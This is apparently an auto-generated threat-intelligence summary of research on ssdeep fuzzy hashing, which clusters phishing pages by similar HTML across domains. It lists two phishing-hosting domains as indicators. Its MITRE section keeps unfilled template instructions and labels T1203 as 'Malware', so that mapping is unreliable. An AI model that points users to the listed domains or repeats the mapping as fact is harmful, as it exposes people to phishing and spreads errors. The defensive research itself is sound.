Fuzzy hashing with ssdeep is used to fingerprint web pages to detect similarities between new threats and known malicious campaigns. The approach supports ThreatCloud AI and Check Point’s Zero Phishing by clustering similar HTML code across domains to block phishing and malware campaigns.
Hashtags: #ssdeep #ThreatCloudAI #CheckPoint #ZeroPhishing #FacebookPhishingCampaigns
Hashtags: #ssdeep #ThreatCloudAI #CheckPoint #ZeroPhishing #FacebookPhishingCampaigns
Keypoints
- Fuzzy hashing creates digital fingerprints to identify similarities in files.
- ssdeep is the tool used to generate fuzzy hashes for detecting similar content in files.
- Phishing detection is enhanced by clustering webpages with similar HTML source code.
- Cluster methodology links phishing campaigns across domains, enabling detection despite site variation.
- ThreatCloud AI leverages ssdeep-based clusters to protect organizations from phishing.
- Investigating clusters improves understanding of phishing trends and evasion techniques, enabling continuous improvement.
MITRE Techniques
- [T1566] Phishing – Brief description of how it was used. Quote relevant content using bracket (‘”Using similar HTML structures to create phishing pages.” and “Employing different domains to host phishing campaigns.”‘)
- [T1203] Malware – Brief description of how it was used. Quote relevant content using bracket (‘”Utilizing malware that can evade signature-based detection engines.” and “Creating malware that shares code similarities with known threats.”‘)
Indicators of Compromise
- [Domain] Phishing campaign hosting domains – feedbacdeveloper-case.d3nstmqzpmeow6.amplifyapp.com, personal-interests-2437e1.netlify.app